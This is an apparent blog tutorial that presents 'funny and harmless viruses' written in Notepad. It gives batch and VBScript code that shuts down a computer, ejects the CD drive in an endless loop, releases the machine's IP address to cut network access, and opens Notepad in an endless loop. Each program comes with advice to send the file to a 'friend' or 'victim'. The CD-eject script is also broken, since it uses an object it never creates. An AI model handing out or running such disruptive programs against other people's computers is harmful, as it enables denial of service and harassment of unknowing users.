Hello guys! How are you. I hope you all are fine. Today i will teach you how to create funny and harmless viruses using notepad. The language used for writing such type of viruses is batch file programming.
This is only for educational purpose don't harm someone. I will not be responsible of any illegal activity.
So let's start. open your notepad and write the following code and save anything.bat
1) This virus will convey a message to your friend and will shutdown his/her computer.
msg * I love you
shutdown -c "Error! going to sleep!" -s
send this file to your friend.
2) This virus will Continually pop out your victim's CD Drive.
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
3) How to stop Victim's internet access:-
@Echo off
Ipconfig /release
Save this as anything.bat and send it to victim. There IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew in place of IPconfig/release.
4) Open Notepad continually in your friend's computer:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as "Anything.BAT" and send it.
Take care guys♥♥♥
No comments:
Post a Comment